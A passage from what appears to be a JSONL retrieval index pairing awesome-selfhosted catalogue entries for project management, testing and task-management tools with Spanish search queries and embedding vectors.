-0.04203, 0.00018, -0.01114, -0.00537, -0.03218, 0.00876, -0.02246, -0.02763, -0.05205, 0.00099, 0.06491, 0.01777, -0.02353, -0.04401, 0.02657, -0.03326, -0.00238, 0.01765, 0.01661, -0.05302, 0.06361, -0.00139, -0.02721, 0.0358, 0.03327]} +{"tipo": "pregunta", "herramienta": "Software Development - Project Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Project Management", "tema": "software development - project management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Project Management: Titra β€” Time-tracking solution for freelancers and small teams [GPL-3.0, Javascript/Docker]. Trac β€” Trac is an enhanced wiki and issue tracking system for software development projects [BSD-3-Clause, Python/deb]. Traq β€” Project management and issue tracking system written in PHP [GPL-3.0, PHP/Nodejs]. Tuleap β€” Tuleap is a libre suite to plan, track, code and collaborate on software projects [GPL-2.0, PHP]. UVDesk β€” UVDesk community is a service oriented, event driven extensible opensource helpdesk system that can be used by your organization to provide efficient support to your clients effortlessly whichever way you imagine [MIT, PHP]. ZenTao β€” An agile(scrum) project management system/tool [AGPL-3.0, PHP].", "indexar": "con que puedo crear un sistema de seguimiento de incidencias tipo wiki", "v": [-0.00012, 0.19591, -0.15496, -0.13449, 0.07408, -0.15572, -0.11673, -0.03849, -0.00801, -0.13818, -0.08389, -0.1193, -0.04827, -0.04974, 0.04387, -0.00467, 0.0434, -0.18666, 0.03041, -0.07095, -0.07194, -0.02312, -0.0142, 0.02188, -0.03809, -0.07629, -0.08941, -0.0957, -0.13028, -0.07115, -0.10393, 0.12101, 0.01257, 0.00339, -0.13522, -0.07021, 0.01537, 0.06082, 0.07629, -0.03673, -0.01563, -0.07136, -0.05812, -0.05095, 0.12129, 0.00711, 0.05864, -1e-05, 0.03004, -0.13126, -0.00634, -0.0377, -0.15037, -0.07032, -0.07878, -0.1518, 0.10835, -0.11072, 0.02839, -0.00347, -0.01525, 0.08865, -0.07202, -0.05087, 0.05486, -0.12569, 0.03242, -0.07645, 0.02369, 0.08506, -0.06595, -0.1738, -0.00551, -0.01146, 0.14874, 0.02017, 0.04327, -0.00991, -0.09782, -0.02138, -0.09235, 0.11113, -0.03427, -0.00202, -0.0129, 0.00865, 0.0321, -0.01837, 0.06819, -0.09747, 0.04869, -0.03554, 0.05804, 0.05536, -0.01933, -0.03801, 0.0392, -0.01536, -0.08752, 0.05917, -0.00609, -0.05243, 0.01682, -0.00834, -0.02121, -0.02922, 0.06844, -0.01566, 0.08773, 0.00991, 0.03901, 0.03819, -0.01105, -0.07714, -0.0296, 0.08004, -0.04084, 0.1021, -0.03046, -0.01471, -0.01038, 0.03106, -0.04116, -0.03107, 0.07354, -0.01757, -0.04136, 0.03968, -0.02368, 0.04693, 0.02063, -0.06334, -0.0545, 0.02622, 0.03028, 0.03958, -0.05444, 0.08759, -0.02728, 0.08327, -0.03518, 0.07293, 0.04249, 0.0312, 0.02212, -0.0172, 0.02732, -0.1079, -0.06356, -0.00215, -0.00597, 0.05034, -0.0206, -0.04993, -0.07153, 0.01885, 0.02975, -0.02669, 0.07666, -0.01229, 0.01129, 0.06875, -0.02273, -0.00905, 0.04223, -0.03426, -0.00835, -0.00909, 0.05227, -0.02657, -0.12201, 0.07059, 0.05715, -0.08033, 0.06476, -0.03907, -0.09316, -0.07631, 0.03545, -0.00118, -0.08844, 0.03703, -0.00438, 0.01163, 0.02899, -0.04273, -0.09331, 0.09219, -0.00754, 0.09434, 0.02305, 0.04617, 0.0164, 0.0228, -0.01686, 0.02714, 0.01295, -0.00892, -0.03882, -0.08085, -0.06659, 0.06335, 0.04412, -0.07571, -0.00118, 0.03524, 0.01864, 0.04013, 0.1047, 0.06073, 0.03508, 0.02693, 0.03859, -0.03043, -0.01387, 0.02901, -0.03544, -0.06629, 0.03609, -0.07114, 0.08067, -0.02335, 0.04087, 0.07061, -0.00907, -0.00182, -0.01863, -0.01772, -0.03907, -0.04896, 0.04682, -0.08349, 0.03214, -0.03622, 0.01633, -0.03995, -0.01917, -0.02811, -0.02935, 0.01027, 0.01079, 0.03333, 0.05395, -0.00617, 0.00025, -0.06924, -0.02248, 0.00769, -0.04331, -0.09732, 0.00114, 0.03423, 0.03789, -0.00846, 0.00919, -0.0294]} +{"tipo": "pregunta", "herramienta": "Software Development - Project Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Project Management", "tema": "software development - project management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Project Management: Titra β€” Time-tracking solution for freelancers and small teams [GPL-3.0, Javascript/Docker]. Trac β€” Trac is an enhanced wiki and issue tracking system for software development projects [BSD-3-Clause, Python/deb]. Traq β€” Project management and issue tracking system written in PHP [GPL-3.0, PHP/Nodejs]. Tuleap β€” Tuleap is a libre suite to plan, track, code and collaborate on software projects [GPL-2.0, PHP]. UVDesk β€” UVDesk community is a service oriented, event driven extensible opensource helpdesk system that can be used by your organization to provide efficient support to your clients effortlessly whichever way you imagine [MIT, PHP]. ZenTao β€” An agile(scrum) project management system/tool [AGPL-3.0, PHP].", "indexar": "cual es una alternativa libre a los gestores Γ‘giles o de tareas", "v": [0.00893, -0.01403, -0.025, 0.03915, 0.02529, 0.04774, -0.0288, 0.00447, -0.12774, 0.0475, -0.09763, -0.11375, -0.00492, 0.12208, 0.27817, -0.03248, 0.11288, -0.06967, 0.09671, 0.08562, -0.03256, 0.10578, -0.00386, -0.0649, -0.08196, -0.07809, 0.05251, -0.11321, -0.0502, 0.04677, -0.0299, -0.02501, 0.06586, -0.24071, 0.05571, 0.09753, -0.05234, 0.0846, 0.04507, -0.07589, -0.06653, -0.01346, -0.16637, 0.11004, 0.11798, -0.15353, -0.00547, -0.04308, -0.01762, 0.07299, -0.06085, -0.02497, 0.0027, -0.03294, 0.0409, 0.06161, 0.11403, -0.06932, -0.09191, -0.10409, -0.0947, 0.10056, 0.04661, 0.02622, 0.03032, 0.01698, 0.04908, 0.00793, -0.09274, 0.0874, 0.10627, 0.0204, -0.03662, -0.00723, -0.06786, 0.02838, -0.00209, 0.02379, -0.07619, -0.06959, 0.13093, -0.03672, -0.03369, 0.03919, -0.04327, -0.14223, -0.05005, -0.10662, -0.03887, -0.0479, 0.00967, -0.00045, -0.00228, 0.07282, -0.07295, -0.02143, 0.02113, 0.11303, 0.00402, 0.1055, 0.01669, 0.08341, -0.06998, 0.06415, 0.00896, 0.06899, -0.03425, 0.04443, -0.01551, 0.00921, -0.00019, 0.02966, 0.04145, 0.04578, 0.00778, 0.02841, -0.02415, 0.01401, 0.00263, 0.01997, 0.02576, -0.03734, 0.0178, 0.00811, 0.08143, -0.01468, 0.15083, 0.04818, 0.0253, 0.02605, 0.08159, -0.01549, -0.09389, -0.0472, -0.13697, 0.0126, 0.06718, -0.02805, 0.00672, -0.06322, -0.08777, 0.02659, 0.06623, -0.00549, 0.06375, 0.04945, 0.00624, -0.04194, -0.02629, -0.02263, -0.00661, 0.00104, -0.02593, 0.10281, 0.00058, -0.0296, -0.03126, 0.03341, -0.10835, 0.10839, 0.08976, -0.04078, -0.01328, 0.01012, -0.04249, -0.0701, 0.01855, 0.0163, -0.0426, 0.03719, -0.03125, 0.02416, 0.08751, -0.07447, 0.06913, -0.04177, -0.0068, -0.08776, 0.10654, -0.00875, 0.04177, 0.0344, -0.03418, 0.03802, -0.00406, -0.08909, -0.04714, 0.07342, -0.02722, 0.087, 0.02679, -0.0023, -0.03834, -0.11345, 0.03701, -0.02062, -0.01046, -0.01398, -0.03583, 0.00046, -0.02493, -0.09513, -0.00699, 0.01532, -0.02978, 0.03174, -0.04857, 0.07894, 0.04804, 0.08158, 0.03005, 0.0435, 0.07444, 0.05389, -0.02106, -0.02187, -0.03077, -0.03414, 0.03016, -0.03198, 0.00583, -0.00316, 0.0593, 0.01434, 0.01417, 0.05711, 0.03653, 0.04817, -0.04141, 0.01619, 0.00279, -0.02558, 0.00559, 0.03087, 0.01786, -0.01192, 0.02321, 0.02721, 0.01293, -0.00939, 0.02768, 0.07502, -0.01018, -0.0052, -0.07832, 0.01129, -0.07312, -0.03996, -0.08226, -0.03069, -0.05616, -0.00604, 0.0031, 0.01221, 0.01352, -0.02755]} +{"tipo": "pregunta", "herramienta": "Software Development - Testing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Testing", "tema": "software development - testing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Testing: Bencher β€” Suite of continuous benchmarking tools designed to catch performance regressions in CI [MIT/Apache-2.0, Rust]. Request Inbox β€” Collect and inspect HTTP requests for testing and debugging. Create and manage inboxes, capture detailed request data, configure custom responses [Apache-2.0, Docker]. WebHook Tester β€” Powerful tool for testing WebHooks and more [MIT, Docker/Go/deb/K8S].", "indexar": "cual es una herramienta para medir el rendimiento de la aplicaciΓ³n en los tests", "v": [0.00703, 0.0517, -0.10438, -0.23163, 0.12291, -0.02749, -0.15643, 0.04381, -0.0366, -0.01331, -0.09878, 0.00517, -0.02263, -0.08834, 0.08207, 0.03996, 0.02039, -0.15543, -0.05481, -0.02532, 0.02911, -0.00863, -0.13246, -0.05976, -0.08204, 0.17362, -0.00233, 0.01145, -0.14727, -0.04829, -0.07164, 0.02379, 0.06629, -0.11263, -0.11854, -0.09225, -0.05133, 0.03493, -0.03, 0.09926, -0.0387, 0.02346, -0.0234, -0.02357, 0.08811, 0.00036, 0.00698, 0.10663, -0.03687, -0.02119, -0.02313, -0.08772, 0.02893, 0.00733, -0.07091, -0.12263, 0.07857, -0.05381, 0.04803, -0.11975, -0.08002, -0.05808, -0.05157, -0.07144, 0.0665, -0.09494, -0.02713, -0.0172, -0.13287, 0.02566, 0.02992, 0.08175, -0.04616, -0.01046, -0.01855, 0.07161, -0.02062, 0.04047, -0.00802, -0.08933, -0.0066, -0.03631, -0.0878, 0.03451, -0.08825, -0.10876, 0.11633, -0.05685, 0.02991, 0.0064, -0.07452, -0.00636, -0.04502, 0.0323, -0.04429, -0.05924, 0.17579, -0.05663, 0.05698, -0.02943, 0.09407, -0.08802, -0.09106, -0.00865, -0.07004, 0.03915, -0.02584, -0.00651, -0.09906, -0.03424, 0.09762, -0.04188, -0.1058, 0.09576, -0.03737, 0.06519, -0.05721, -0.08397, -0.03381, -0.11481, -0.05191, 0.03997, -0.07806, -0.07458, 0.02013, -0.0408, -0.00019, 0.04046, 0.03696, 0.0106, 0.06615, 0.02545, -0.10921, 0.055, -0.05051, 0.00323, 0.02482, -0.10924, 0.00752, -0.00481, 0.01993, 0.03318, -0.01205, -0.03023, 0.05872, -0.02071, -0.01139, 0.01118, -0.06381, 0.05305, 0.01683, -0.0853, -0.03141, 0.02832, -0.11786, -0.02258, -0.00275, -0.01116, -0.07224, 0.00072, -0.08292, -0.07356, 0.00381, 0.00689, 0.05587, -0.03579, 0.07284, 0.00113, 0.05705, 0.05957, 0.0071, -0.03067, 0.03347, -0.10574, 0.06308, -0.02136, 0.01257, -0.00685, 0.03151, -0.07533, -0.04037, 0.02152, -0.01858, -0.04915, 0.00936, -0.02211, 0.01007, 0.00035, 0.06025, 0.02045, 0.02803, 0.07718, 0.00434, -0.07121, 0.0544, -0.01492, 0.03312, -0.09075, 0.01053, -0.02144, -0.06499, -0.05622, -0.05491, -0.04574, 0.07683, 0.10931, -0.02251, 0.06476, -0.0039, 0.04202, 0.0186, 0.0188, 0.0868, 0.03509, -0.02602, -0.01503, 0.06526, 0.01831, -0.02084, -0.00893, -0.05854, -0.02236, 0.0537, -0.02907, -0.03633, 0.07668, 0.0396, -0.00078, 0.01124, -0.01257, 0.02329, -0.02102, -0.01243, -0.00887, 0.06327, -0.03594, 0.05943, -0.03772, -0.03412, -0.09399, -0.03338, 0.08407, 0.04207, -0.03478, -0.07819, 0.0132, -0.04318, -0.03451, -0.02148, -0.1276, -0.02337, 0.023, 0.08192, -0.04523, 0.07248, -0.04269]} +{"tipo": "pregunta", "herramienta": "Software Development - Testing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Testing", "tema": "software development - testing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Testing: Bencher β€” Suite of continuous benchmarking tools designed to catch performance regressions in CI [MIT/Apache-2.0, Rust]. Request Inbox β€” Collect and inspect HTTP requests for testing and debugging. Create and manage inboxes, capture detailed request data, configure custom responses [Apache-2.0, Docker]. WebHook Tester β€” Powerful tool for testing WebHooks and more [MIT, Docker/Go/deb/K8S].", "indexar": "como puedo capturar y revisar las peticiones HTTP durante el desarrollo", "v": [0.05813, 0.03495, -0.15048, -0.14922, 0.1065, -0.04418, 0.04938, 0.08037, 0.05793, -0.01357, -0.11513, 0.01628, -0.0499, -0.08323, 0.05795, -0.02785, 0.05109, 0.08929, 0.07309, -0.06238, 0.02986, -0.0502, -0.00552, -0.06353, -0.03955, -0.08041, 0.0514, 0.07484, -0.08129, -0.12611, 0.06334, -0.01205, -0.06276, 0.20402, -0.12368, -0.05036, -0.0596, 0.07053, -0.0154, 0.02764, -0.00673, 0.08812, -0.08208, -0.02553, -0.06372, -0.07564, 0.01365, -0.08045, -0.01846, -0.13625, 0.02567, 0.07354, -0.21055, 0.00955, -0.09201, 0.13341, 0.12599, -0.14436, 0.04144, -0.10464, -0.03266, -0.0541, 0.12503, -0.0521, 0.06216, -0.09695, -0.11512, 0.08462, -0.12754, 0.10919, 0.00468, 0.04783, 0.00365, -0.01266, 0.08596, 0.00823, -0.08251, -0.07924, -0.04503, 0.02087, -0.04656, -0.02307, -0.08561, 0.05262, -0.11562, 0.03393, -0.05871, -0.11892, 0.03052, -0.07459, 0.06544, 0.04117, -0.00492, -0.05223, -0.06561, -0.05045, -0.03301, -0.03328, 0.00544, 0.00582, -0.07891, -0.03785, -0.01508, -0.00492, 0.03065, 0.08048, 0.1031, -0.02937, -0.02382, -0.0396, -0.0461, 0.05164, -0.05576, 0.03552, 0.01312, -0.04558, -0.09153, -0.08809, 0.04563, -0.09662, -0.04545, -0.08128, -0.10739, -0.05995, 0.03109, 0.01483, -0.03996, 0.04063, 0.0743, -0.01176, 0.00572, 0.003, -0.04686, 0.00225, -0.02636, 0.01096, 0.06974, -0.02762, -0.00159, 0.0011, -0.0756, -0.00246, -0.01947, -0.0272, 0.08335, 0.00044, 0.00474, -0.00175, -0.06828, -0.00027, 0.03526, -0.01115, -0.01158, 0.02068, -0.09022, 0.04897, 0.00917, -0.08431, -0.01862, 0.07007, 0.04981, -0.00089, 0.00911, 0.00739, 0.01603, 0.00586, -0.09206, 0.01273, 0.04353, -0.04011, 0.00586, -0.03649, -0.10173, -0.1724, 0.00075, -0.06066, -0.0374, -0.01791, 0.03356, -0.09794, -0.07029, 0.07302, -0.01466, -0.00946, -0.02366, -0.03526, 0.03401, -0.03873, 0.02235, 0.05471, 0.05648, 0.00799, -0.07759, 0.02765, 0.02512, -0.04535, -0.07024, 0.07076, 0.03719, -0.02984, -0.01924, -0.06776, 0.02047, -0.07479, -0.0002, -0.0428, -0.03465, 0.05426, -0.05296, -0.04086, 0.00137, -0.00011, 0.09837, -0.01584, 0.01605, -0.04768, 0.07188, 0.05605, -0.03665, 8e-05, -0.03219, 0.07632, 0.05506, 0.05456, 0.03508, 0.00307, 0.04372, 0.00396, 0.00743, -0.00549, -0.00088, 0.04315, -0.10959, -0.01945, 0.03556, 0.06139, -0.00966, -0.0345, -0.05734, -0.02129, 0.07254, 0.03486, -0.09549, -0.00835, 0.02676, -0.04822, -0.09407, -0.00988, 0.03985, -0.06083, -0.04742, 0.04269, 0.06379, -0.06168, -0.00694, -0.00724]} +{"tipo": "pregunta", "herramienta": "Software Development - Testing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Testing", "tema": "software development - testing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Testing: Bencher β€” Suite of continuous benchmarking tools designed to catch performance regressions in CI [MIT/Apache-2.0, Rust]. Request Inbox β€” Collect and inspect HTTP requests for testing and debugging. Create and manage inboxes, capture detailed request data, configure custom responses [Apache-2.0, Docker]. WebHook Tester β€” Powerful tool for testing WebHooks and more [MIT, Docker/Go/deb/K8S].", "indexar": "que programa sirve para probar que los webhooks funcionen correctamente", "v": [-0.03131, 0.01792, -0.26392, -0.12041, 0.11814, -0.20547, 0.04907, -0.06138, -0.05269, -0.18247, -0.08995, -0.04802, 0.03172, -0.08316, 0.00622, 0.01455, 0.09116, -0.1955, 0.01272, -0.01275, -0.03283, -0.05351, -0.09997, -0.09804, -0.00839, -0.05515, 0.05103, -0.0843, -0.11259, -0.00385, 0.03519, -0.06815, 0.13551, -0.0986, -0.07572, 0.05697, -0.04611, 0.00408, 0.11869, 0.14337, 0.01652, -0.00589, -0.0146, 0.06476, -0.03068, 0.08974, 0.06558, -0.06352, -0.05859, 0.02655, 0.01277, -0.07436, 0.00396, 0.05562, -0.0662, -0.0601, -0.07388, -0.1288, -0.04024, 0.04693, 0.00282, -0.07428, 0.03744, -0.04255, 0.06171, -0.03463, 0.03534, 0.02108, -0.0433, 0.00358, -0.02046, 0.10478, 0.04904, 0.00108, -0.11153, 0.03098, 0.0088, -0.04413, 0.04407, -0.02401, 0.01952, 0.01421, -0.07847, 0.07427, -0.12109, -0.02261, 0.01935, -0.03967, -0.02427, -0.08587, 0.04292, 0.06366, 0.0625, 0.03185, 0.06706, -0.06388, 0.12566, -0.00279, 0.10024, 0.02827, 0.07589, -0.09863, -0.12756, 0.03882, -0.05286, 0.09108, 0.08553, 0.03379, -0.11534, 0.01547, -0.04423, -0.07043, -0.14792, -0.02218, -0.06686, 0.01547, -0.11024, 0.00391, 0.00298, -0.04827, -0.11852, 0.09671, -0.08552, 0.07091, 0.07467, 0.04332, 0.05067, 0.08128, -0.01655, 0.0408, -0.03, -0.03195, -0.05601, 0.06083, -0.00671, -0.06328, 0.04873, -0.01423, 0.00117, -0.02197, 0.096, 0.08548, -0.03476, 0.02923, -0.04254, 0.01351, 0.09437, 0.00837, -0.03251, 0.05278, -0.07019, -0.02507, 0.0145, 0.06894, -0.08073, -0.1017, 0.00024, -0.03806, -0.0304, 0.05857, -0.09432, -0.00219, 0.08297, 0.01453, 0.05021, 0.00954, -0.07464, 0.01502, 0.09718, 0.00802, -0.01596, 0.11647, 0.0266, -0.0979, 0.03515, 0.07625, -0.06652, -0.02248, 0.09025, 0.00058, -0.05297, -0.01245, 0.05296, 0.03532, -0.00128, -0.0254, -0.00647, 0.027, -0.0366, 0.01926, 0.00804, -0.01686, -0.05439, 0.01643, 0.01025, 0.03541, 0.0097, -0.02794, 0.00689, -0.04176, -0.05445, -0.04002, 0.02173, -0.01405, 0.02431, 0.07726, 0.00051, 0.01291, 0.02879, 0.04988, 0.03272, -0.01328, 0.03866, 0.00167, -0.00796, -0.02652, 0.04565, 0.03681, -0.01409, 0.05496, 0.00702, -0.0573, -0.03052, 0.06856, 0.01068, -0.0075, 0.03824, -0.01364, -0.01606, -0.01079, 0.00772, -0.05522, -0.0129, -0.00532, -0.03074, -0.00302, 0.02583, 0.0352, -0.05767, -0.06663, -0.00875, 0.05644, -0.00545, -0.03798, 0.04631, -0.02005, -0.04286, -0.05381, 0.02777, 0.01616, -0.07452, 0.02413, -0.01035, 0.00628, 0.05109, 0.02507]} +{"tipo": "pregunta", "herramienta": "Task Management & To-do Lists", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Task Management & To-do Lists", "tema": "task management & to-do lists", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Task Management & To-do Lists: 4ga Boards β€” Straightforward realtime kanban boards management for intuitive task tracking. Featuring an elegant dark mode, collapsible todo lists, and multitasking tools to supercharge your team's productivity [MIT, Nodejs/Docker/K8S]. AppFlowy β€” Build detailed lists of to-do’s for different projects while tracking the status of each one. Open Source Notion Alternative [AGPL-3.0, Rust/Dart/Docker]. dayGLANCE β€” Day planner with drag-and-drop time blocking, inbox, recurring tasks, habits, routines, goals, projects and Pomodoro focus mode, plus iCal and CalDAV calendar sync. Data stays in the browser, with optional WebDAV or GLANCEvault sync [MIT, Javascript/Docker]. Donetick β€” Task and chore management tool for personal and family use, with advanced scheduling, flexible assignment, and group sharing capabilities, detailed history, automation via API, simple and modern design [AGPL-3.0, Go/Docker]. Focus Flow β€” Complete ecosystem for time management using the Pomodoro technique [MIT, Docker/K8S].", "indexar": "que herramienta sirve para organizar tareas en formato kanban sin instalar nada en el servidor?", "v": [0.0186, 0.10865, -0.23569, -0.21288, 0.00745, -0.20346, -0.03683, -0.023, -0.02857, -0.00827, -0.16957, -0.10276, 0.04651, -0.112, 0.05831, 0.14762, 0.16346, -0.16878, 0.04985, 0.07821, -0.04459, 0.03136, -0.00307, 0.03307, -0.09653, 0.00744, 0.04964, -0.0762, -0.20701, -0.00057, 0.03532, 0.0076, 0.10538, -0.0834, -0.01794, -0.0212, -0.04116, 0.05576, -0.11457, 0.07448, -0.0149, 0.0948, -0.07519, 0.11533, 0.01051, -0.02388, 0.07059, -0.03951, 0.02717, 0.0557, -0.01876, -0.11189, -0.02771, -0.0161, -0.04441, -0.14305, 0.11095, -0.19427, 0.00836, -0.04134, -0.14398, 0.08079, -0.06336, 0.00371, 0.11777, 0.06892, -0.0345, 0.03173, -0.09367, -0.00187, -0.06968, 0.00344, 0.00975, -0.05236, 0.01189, 0.06404, -0.03746, 0.03333, 0.02231, 0.04959, 0.0749, 0.02303, -0.04352, 0.04883, -0.07861, -0.13824, 0.01944, 0.00972, 0.03126, -0.06556, 0.01491, 0.07845, -0.00847, 0.03204, 0.01648, -0.09756, 0.13128, -0.02827, 0.04874, 0.01789, 0.0672, -0.0381, -0.03148, 0.10145, -0.06497, 0.04565, 0.02403, -0.02232, 0.03932, -0.02476, 0.04147, 0.05792, 0.02936, 0.0249, -0.05226, -0.04807, 0.05709, -0.04416, 0.01158, 0.03984, 0.003, 0.02051, 0.01502, 0.04381, 0.02849, -0.08201, 0.07615, 0.06083, 0.02952, -0.02403, 0.03968, -0.04087, -0.05574, 0.0623, -0.05543, -0.04208, 0.0431, -0.10347, -0.05854, -0.07864, -0.0067, 0.0819, -0.04157, -0.1019, 0.07588, 0.01829, 0.08965, -0.02961, -0.04362, 0.01399, 0.08639, -0.05244, -0.01249, 0.01555, -0.05841, -0.02828, -0.0001, -0.02341, -0.03869, 0.01004, 0.01, -0.01094, 0.06164, 0.0402, -0.01145, -0.06018, 0.0186, 0.02104, 0.07583, 0.08003, -0.01037, 0.0156, 0.03289, -0.08978, -0.00633, -0.05783, -0.04472, -0.02428, 0.07106, 0.00633, -0.01259, 0.05247, -0.01913, 0.01975, -0.03003, -0.05548, 0.02254, -0.03903, -0.04865, -0.01694, 0.03838, 0.00244, -0.03178, -0.05099, 0.06418, -0.02718, -0.05788, -0.07083, 0.00524, -0.00347, -0.03143, -0.05851, -0.0374, -0.00295, 0.02951, 0.02962, -0.05275, 0.04508, 0.03549, 0.07105, 0.01978, -0.00921, 0.01946, -0.03397, -0.01711, -0.03048, 0.02403, -0.0431, 0.01005, 0.00748, -0.01548, 0.0051, 0.02111, -0.07318, 0.00881, 0.00012, 0.04122, 0.01369, 0.04131, 0.00988, -0.0282, 0.01821, -0.00978, -0.0038, 0.01592, -0.06215, 0.03323, -0.02069, -0.04286, -0.05121, -0.01702, 0.04394, 0.01135, -0.05092, -0.07539, -0.04862, -0.00223, -0.00053, -0.07212, -0.06447, -0.02623, 0.00883, 0.07499, -0.03905, -0.00715, -0.016]} +{"tipo": "pregunta", "herramienta": "Task Management & To-do Lists", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Task Management & To-do Lists", "tema": "task management & to-do lists", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Task Management & To-do Lists: 4ga Boards β€” Straightforward realtime kanban boards management for intuitive task tracking. Featuring an elegant dark mode, collapsible todo lists, and multitasking tools to supercharge your team's productivity [MIT, Nodejs/Docker/K8S]. AppFlowy β€” Build detailed lists of to-do’s for different projects while tracking the status of each one. Open Source Notion Alternative [AGPL-3.0, Rust/Dart/Docker]. dayGLANCE β€” Day planner with drag-and-drop time blocking, inbox, recurring tasks, habits, routines, goals, projects and Pomodoro focus mode, plus iCal and CalDAV calendar sync. Data stays in the browser, with optional WebDAV or GLANCEvault sync [MIT, Javascript/Docker]. Donetick β€” Task and chore management tool for personal and family use, with advanced scheduling, flexible assignment, and group sharing capabilities, detailed history, automation via API, simple and modern design [AGPL-3.0, Go/Docker]. Focus Flow β€” Complete ecosystem for time management using the Pomodoro technique [MIT, Docker/K8S].", "indexar": "cual es una alternativa libre a Notion para gestionar listas de pendientes detalladas?", "v": [0.09775, 0.1839, -0.03002, 0.007, -0.0021, -0.10596, -0.02685, -0.06365, -0.21012, -0.04585, 0.0018, -0.2314, -0.0076, -0.01855, 0.0639, -0.03198, -0.03986, -0.12306, 0.07989, 0.07732, -0.20059, 0.04777, -0.06764, -0.0271, -0.11897, -0.1007, 0.09329, -0.07975, -0.13164, 0.07908, -0.00506, -0.08615, -0.00601, -0.08874, 0.08593, 0.15354, 0.11214, 0.03616, -0.01837, -0.0947, 0.00763, 0.01346, -0.03011, 0.05204, 0.0482, -0.19114, -0.01273, 0.1026, 0.02869, -0.0376, -0.01882, -0.01114, -0.05842, 0.03581, 0.06798, -0.10757, 0.12555, -0.08484, -0.03159, -0.0476, -0.07617, 0.04612, 0.01647, 0.02962, -0.01268, 0.00127, -0.00556, 0.04714, -0.02722, 0.11618, 0.03258, -0.01823, 0.06938, -0.00808, -0.0791, 0.02387, 0.03411, 0.0709, -0.08082, 0.08163, 0.03829, -0.0094, 0.00025, 0.04308, -0.02206, -0.07419, 0.03548, -0.00148, 0.00974, -0.00236, 0.01582, -0.03266, -0.11186, 0.00519, 0.03902, -0.03258, 0.01716, 0.15566, 0.00956, 0.03446, 0.05041, 0.1169, -0.08435, 0.02665, -0.00599, 0.06469, -0.0353, -0.00754, -0.05612, 0.02984, -0.07764, 0.01662, -0.00635, 0.02623, -0.0141, 0.0235, -0.05886, 0.04136, -0.0328, -0.0241, -0.05646, 0.01167, -0.0424, -0.06057, 0.11926, 0.05411, 0.10909, 0.0665, -0.01917, 0.04104, -0.04304, -0.02132, -0.07178, -0.13456, -0.05217, -0.06128, -0.0052, 0.04482, 0.0337, 0.00132, -0.09418, 0.03772, 0.05745, 0.00967, 0.04827, -0.12841, 0.03663, -0.03125, 0.03625, 0.03016, 0.03411, -0.02048, 0.02978, 0.11156, 0.03145, -0.01542, -0.01128, 0.00523, -0.06815, 0.10071, 0.04255, -0.00633, -0.0425, 0.02906, 0.00709, 0.00368, 0.03065, 0.01836, -0.10237, -0.04135, 0.03254, 0.03917, 0.02058, -0.06265, 0.03947, -0.09912, 0.01825, -0.06639, 0.04213, 0.01668, -0.03634, 0.01647, -0.02988, 0.01719, -0.01425, -0.05419, -0.00835, 0.02723, -0.01798, 0.07932, -0.0287, -0.02814, -0.0524, -0.07344, 0.07528, -0.01367, 0.0649, -0.09326, -0.08555, -0.04641, -0.07725, -0.04851, 0.00735, 0.01124, -0.0468, 0.0123, -0.05681, 0.06696, 0.03894, 0.00886, 0.067, 0.05033, 0.08686, 0.01234, -0.05778, -0.04925, -0.03507, -0.03243, 0.02713, -0.02053, 0.04186, 0.04866, 0.0227, 0.01093, 0.03124, 0.03234, 0.06169, 0.07846, -0.01742, 0.02098, 0.02836, 0.00739, 0.05574, 0.02926, -0.00354, -0.01626, 0.00121, 0.01727, -0.00892, 0.04224, 0.07557, 0.1442, 0.01427, -0.01586, -0.05687, 0.01594, -0.0583, -0.00659, -0.06511, -0.0906, -0.02106, 0.03011, 0.01014, 0.0217, 0.05561, 0.00411]} +{"tipo": "pregunta", "herramienta": "Task Management & To-do Lists", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Task Management & To-do Lists", "tema": "task management & to-do lists", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Task Management & To-do Lists: 4ga Boards β€” Straightforward realtime kanban boards management for intuitive task tracking. Featuring an elegant dark mode, collapsible todo lists, and multitasking tools to supercharge your team's productivity [MIT, Nodejs/Docker/K8S]. AppFlowy β€” Build detailed lists of to-do’s for different projects while tracking the status of each one. Open Source Notion Alternative [AGPL-3.0, Rust/Dart/Docker]. dayGLANCE β€” Day planner with drag-and-drop time blocking, inbox, recurring tasks, habits, routines, goals, projects and Pomodoro focus mode, plus iCal and CalDAV calendar sync. Data stays in the browser, with optional WebDAV or GLANCEvault sync [MIT, Javascript/Docker]. Donetick β€” Task and chore management tool for personal and family use, with advanced scheduling, flexible assignment, and group sharing capabilities, detailed history, automation via API, simple and modern design [AGPL-3.0, Go/Docker]. Focus Flow β€” Complete ecosystem for time management using the Pomodoro technique [MIT, Docker/K8S].", "indexar": "con que puedo montar un planificador diario con bloqueo de tiempo y sincronizaciΓ³n de calendario?", "v": [0.00683, 0.01894, -0.18361, -0.08436, -0.15154, -0.06461, 0.06529, 0.10707, -0.15764, -0.12811, -0.01855, -0.08419, 0.11724, -0.08642, 0.00227, 0.015, -0.01334, -0.06133, -0.03516, -0.05097, -0.07368, -0.09199, 0.10429, 0.02804, 0.00357, -0.12799, -0.05193, -0.04681, -0.25622, -0.04464, -0.0324, 0.03819, 0.14973, 